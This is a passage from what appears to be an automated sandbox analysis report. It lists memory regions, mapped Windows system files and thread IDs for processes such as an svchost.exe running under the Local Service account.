entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 3253 start_va = 0x2850000 end_va = 0x2d41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002850000" filename = "" Region: id = 3254 start_va = 0x2d50000 end_va = 0x3faffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 3255 start_va = 0x7fffc0700000 end_va = 0x7fffc07adfff monitored = 0 entry_point = 0x7fffc074b570 region_type = mapped_file name = "textshaping.dll" filename = "\\Windows\\System32\\TextShaping.dll" (normalized: "c:\\windows\\system32\\textshaping.dll") Region: id = 3256 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3257 start_va = 0x7fffb7b90000 end_va = 0x7fffb7e29fff monitored = 0 entry_point = 0x7fffb7c296c0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1_none_b555e41d4684ddec\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1_none_b555e41d4684ddec\\comctl32.dll") Region: id = 3258 start_va = 0x1f30000 end_va = 0x1f30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 3259 start_va = 0x1f40000 end_va = 0x1f41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 3260 start_va = 0x7fffc8010000 end_va = 0x7fffc803dfff monitored = 0 entry_point = 0x7fffc80142d0 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Thread: id = 275 os_tid = 0xb28 Thread: id = 276 os_tid = 0x149c Thread: id = 277 os_tid = 0x904 Thread: id = 278 os_tid = 0x14b4 Thread: id = 279 os_tid = 0x1498 Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x5c09d000" os_pid = "0x404" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x264" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService -p" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-1264790548-4164306546-4160824920-750804445-3452039388" [0xa], "NT SERVICE\\bthserv" [0xa], "S-1-5-80-2195691530-3564058219-2185687823-1858318469-3207429352" [0xa], "NT SERVICE\\CDPSvc" [0xa], "S-1-5-80-4171086659-1617898341-2870161492-1466607281-2109097600" [0xe], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "S-1-5-80-3246321066-2451215914-3422911474-2201726393-166328789" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d316" [0xc000000f], "LOCAL" [0x7], "S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674" [0x7], "S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331" [0x7], "S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067" [0x7], "S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263" [0x7], "S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053" [0x7], "S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462" [0x7] Region: id = 3611 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3612 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3613 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3614 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3615 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3616 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3617 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3618 start_va = 0x100000 end_va = 0x108fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 3619 start_va = 0x110000 end_va = 0x1d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3620 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 3621 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3622 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3623 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3624 start_va = 0x680000 end_va = 0x688fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 3625 start_va = 0x690000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 3626 start_va = 0x890000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 3627 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 3628 start_va = 0xa30000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 3629 start_va = 0xb00000 end_va = 0xb00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 3630 start_va = 0xb10000 end_va = 0xb18fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 3631 start_va = 0xb20000 end_va = 0xb20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 3632 start_va = 0xb30000 end_va = 0xb30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 3633 start_va = 0xb40000 end_va = 0xb4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 3634 start_va = 0xb50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 3635 start_va = 0xb60000 end_va = 0xb60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 3636 start_va = 0xb70000 end_va = 0xbc2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 3637 start_va = 0xbd0000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 3638 start_va = 0xbe0000 end_va = 0xbe1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netprofmsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui") Region: id = 3639 start_va = 0xbf0000 end_va = 0xbf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 3640 start_va = 0xc00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 3641 start_va = 0xf00000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 3642 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 3643 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 3644 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 3645 start_va = 0x1300000 end_va = 0x22fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 3646 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 3647 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 3648 start_va = 0x2500000 end_va = 0x2837fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3649 start_va = 0x2a40000 end_va = 0x2a44fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 3650 start_va = 0x2a50000 end_va = 0x2a5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 3651 start_va = 0x2a60000 end_va = 0x2a60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a60000" filename = "" Region: id = 3652 start_va = 0x2a70000 end_va = 0x2a72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 3653 start_va = 0x2a90000 end_va = 0x2a90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 3654 start_va = 0x2aa0000 end_va = 0x2ad1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui") Region: id = 3655 start_va = 0x2bc0000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 3656 start_va = 0x2cc0000 end_va = 0x2dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 3657 start_va = 0x2dc0000 end_va = 0x2dc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002dc0000" filename = "" Region: id = 3658 start_va = 0x3000000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 3659 start_va = 0x3240000 end_va = 0x32bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 3660 start_va = 0x32c0000 end_va = 0x33bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 3661 start_va = 0x33c0000 end_va = 0x34bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 3662 start_va = 0x34c0000 end_va = 0x35bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 3663 start_va = 0x3740000 end_va = 0x387efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3664 start_va = 0x3980000 end_va = 0x3a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003980000" filename = "" Region: id = 3665 start_va = 0x3a80000 end_va = 0x3b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 3666 start_va = 0x3b80000 end_va = 0x3b93fff monitored = 0 entry_point = 0x3b9ec00 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3667 start_va = 0x3ba0000 end_va = 0x3ba3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 3668 start_va = 0x3bb0000 end_va = 0x3bb9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 3669 start_va = 0x3bc0000 end_va = 0x3bc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bc0000" filename = "" Region: id = 3670 start_va = 0x3bd0000 end_va = 0x3bd0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontset-s-1-5-21-245394380-2276627025-4024548581-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontSet-S-1-5-21-245394380-2276627025-4024548581-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontset-s-1-5-21-245394380-2276627025-4024548581-1000.dat") Region: id = 3671 start_va = 0x3c00000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 3672 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 3673 start_va = 0x3f00000 end_va = 0x3ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 3674 start_va = 0x4080000 end_va = 0x40c6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004080000" filename = "" Region: id = 3675 start_va = 0x40d0000 end_va = 0x41cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3676 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3677 start_va = 0x4300000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004300000" filename = "" Region: id = 3678 start_va = 0x4480000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 3679 start_va = 0x4580000 end_va = 0x4d7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-245394380-2276627025-4024548581-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-245394380-2276627025-4024548581-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-245394380-2276627025-4024548581-1000.dat") Region: id = 3680 start_va = 0x5000000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 3681 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3682 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 3683 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 3684 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 3685 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 3686 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 3687 start_va = 0x7ff612ac0000 end_va = 0x7ff612ad0fff monitored = 0 entry_point = 0x7ff612ac4e80 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3688 start_va = 0x7fffa9590000 end_va = 0x7fffa9672fff monitored = 0 entry_point = 0x7fffa95b2160 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 3689 start_va = 0x7fffaad00000 end_va = 0x7fffaae1cfff monitored = 0 entry_point = 0x7fffaad26c50 region_type = mapped_file name = "licensemanager.dll" filename = "\\Windows\\System32\\LicenseManager.dll" (normalized: "c:\\windows\\system32\\licensemanager.dll") Region: id = 3690 start_va = 0x7fffabd90000 end_va = 0x7fffabdcafff monitored = 0 entry_point = 0x7fffabd93530 region_type = mapped_file name = "authbroker.dll" filename = "\\Windows\\System32\\AuthBroker.dll" (normalized: "c:\\windows\\system32\\authbroker.dll") Region: id = 3691 start_va = 0x7fffadfd0000 end_va = 0x7fffadfe1fff monitored = 0 entry_point = 0x7fffadfd20f0 region_type = mapped_file name = "licensemanagersvc.dll" filename = "\\Windows\\System32\\LicenseManagerSvc.dll" (normalized: "c:\\windows\\system32\\licensemanagersvc.dll") Region: id = 3692 start_va = 0x7fffaf150000 end_va = 0x7fffaf241fff monitored = 0 entry_point = 0x7fffaf168ad0 region_type = mapped_file name = "windows.security.authentication.onlineid.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.OnlineId.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.onlineid.dll") Region: id = 3693 start_va = 0x7fffb5030000 end_va = 0x7fffb528dfff monitored = 0 entry_point = 0x7fffb5098a80 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 3694 start_va = 0x7fffb82c0000 end_va = 0x7fffb82c9fff monitored = 0 entry_point = 0x7fffb82c2140 region_type = mapped_file name = "sbservicetrigger.dll" filename = "\\Windows\\System32\\sbservicetrigger.dll" (normalized: "c:\\windows\\system32\\sbservicetrigger.dll") Region: id = 3695 start_va = 0x7fffb82d0000 end_va = 0x7fffb82e4fff monitored = 0 entry_point = 0x7fffb82d8de0 region_type = mapped_file name = "wshbth.dll" filename = "\\Windows\\System32\\wshbth.dll" (normalized: "c:\\windows\\system32\\wshbth.dll") Region: id = 3696 start_va = 0x7fffb82f0000 end_va = 0x7fffb8388fff monitored = 0 entry_point = 0x7fffb82f8a20 region_type = mapped_file name = "cdpsvc.dll" filename = "\\Windows\\System32\\cdpsvc.dll" (normalized: "c:\\windows\\system32\\cdpsvc.dll") Region: id = 3697 start_va = 0x7fffb8e00000 end_va = 0x7fffb8f13fff monitored = 0 entry_point = 0x7fffb8e07b20 region_type = mapped_file name = "sharehost.dll" filename = "\\Windows\\System32\\ShareHost.dll" (normalized: "c:\\windows\\system32\\sharehost.dll") Region: id = 3698 start_va = 0x7fffba7f0000 end_va = 0x7fffbac8dfff monitored = 0 entry_point = 0x7fffba841e80 region_type = mapped_file name = "cdp.dll" filename = "\\Windows\\System32\\cdp.dll" (normalized: "c:\\windows\\system32\\cdp.dll") Region: id = 3699 start_va = 0x7fffbad10000 end_va = 0x7fffbadc7fff monitored = 0 entry_point = 0x7fffbad1d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 3700 start_va = 0x7fffbaf60000 end_va = 0x7fffbaf74fff monitored = 0 entry_point = 0x7fffbaf62930 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 3701 start_va = 0x7fffbafb0000 end_va = 0x7fffbb009fff monitored = 0 entry_point = 0x7fffbafbb560 region_type = mapped_file name = "ncryptprov.dll" filename = "\\Windows\\System32\\ncryptprov.dll" (normalized: "c:\\windows\\system32\\ncryptprov.dll") Region: id = 3702 start_va = 0x7fffbb010000 end_va = 0x7fffbb035fff monitored = 0 entry_point = 0x7fffbb0172c0 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 3703 start_va = 0x7fffbb740000 end_va = 0x7fffbb758fff monitored = 0 entry_point = 0x7fffbb741870 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 3704 start_va = 0x7fffbd920000 end_va = 0x7fffbda65fff monitored = 0 entry_point = 0x7fffbd927620 region_type = mapped_file name = "windows.staterepositoryps.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryPS.dll" (normalized: "c:\\windows\\system32\\windows.staterepositoryps.dll") Region: id = 3705 start_va = 0x7fffbdac0000 end_va = 0x7fffbdad7fff monitored = 0 entry_point = 0x7fffbdac4880 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 3706 start_va = 0x7fffbe5f0000 end_va = 0x7fffbe5f6fff monitored = 0 entry_point = 0x7fffbe5f1320 region_type = mapped_file name = "gamestreamingext.dll" filename = "\\Windows\\System32\\gamestreamingext.dll" (normalized: "c:\\windows\\system32\\gamestreamingext.dll") Region: id = 3707 start_va = 0x7fffbe600000 end_va = 0x7fffbe60afff monitored = 0 entry_point = 0x7fffbe602ab0 region_type = mapped_file name = "msauserext.dll" filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll") Region: id = 3708 start_va = 0x7fffbe650000 end_va = 0x7fffbe665fff monitored = 0 entry_point = 0x7fffbe651e80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 3709 start_va = 0x7fffbe670000 end_va = 0x7fffbe6ecfff monitored = 0 entry_point = 0x7fffbe673a80 region_type = mapped_file name = "onecorecommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecorecommonproxystub.dll") Region: id = 3710 start_va = 0x7fffbe760000 end_va = 0x7fffbe822fff monitored = 0 entry_point = 0x7fffbe76e000 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 3711 start_va = 0x7fffbe830000 end_va = 0x7fffbe84efff monitored = 0 entry_point = 0x7fffbe835550 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 3712 start_va = 0x7fffbf4e0000 end_va = 0x7fffbf50ffff monitored = 0 entry_point = 0x7fffbf504680 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 3713 start_va = 0x7fffbf980000 end_va = 0x7fffbf98ffff monitored = 0 entry_point = 0x7fffbf9815e0 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3714 start_va = 0x7fffbf990000 end_va = 0x7fffbf9acfff monitored = 0 entry_point = 0x7fffbf99dc70 region_type = mapped_file name = "computenetwork.dll" filename = "\\Windows\\System32\\computenetwork.dll" (normalized: "c:\\windows\\system32\\computenetwork.dll") Region: id = 3715 start_va = 0x7fffbfaf0000 end_va = 0x7fffbfb6efff monitored = 0 entry_point = 0x7fffbfaf5910 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3716 start_va = 0x7fffbfbd0000 end_va = 0x7fffbfbd9fff monitored = 0 entry_point = 0x7fffbfbd14a0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3717 start_va = 0x7fffbfbe0000 end_va = 0x7fffbfc7cfff monitored = 0 entry_point = 0x7fffbfc14640 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3718 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3719 start_va = 0x7fffc0040000 end_va = 0x7fffc0118fff monitored = 0 entry_point = 0x7fffc0070180 region_type = mapped_file name = "netprofmsvc.dll" filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll") Region: id = 3720 start_va = 0x7fffc0510000 end_va = 0x7fffc057bfff monitored = 0 entry_point = 0x7fffc052ec00 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3721 start_va = 0x7fffc05c0000 end_va = 0x7fffc0647fff monitored = 0 entry_point = 0x7fffc05e8660 region_type = mapped_file name = "ncsi.dll" filename = "\\Windows\\System32\\ncsi.dll" (normalized: "c:\\windows\\system32\\ncsi.dll") Region: id = 3722 start_va = 0x7fffc06c0000 end_va = 0x7fffc06dcfff monitored = 0 entry_point = 0x7fffc06c29b0 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3723 start_va = 0x7fffc0700000 end_va = 0x7fffc07adfff monitored = 0 entry_point = 0x7fffc074b570 region_type = mapped_file name = "textshaping.dll" filename = "\\Windows\\System32\\TextShaping.dll" (normalized: "c:\\windows\\system32\\textshaping.dll") Region: id = 3724 start_va = 0x7fffc07b0000 end_va = 0x7fffc07c6fff monitored = 0 entry_point = 0x7fffc07b24b0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3725 start_va = 0x7fffc07d0000 end_va = 0x7fffc07fdfff monitored = 0 entry_point = 0x7fffc07d35a0 region_type = mapped_file name = "fontprovider.dll" filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll") Region: id = 3726 start_va = 0x7fffc0800000 end_va = 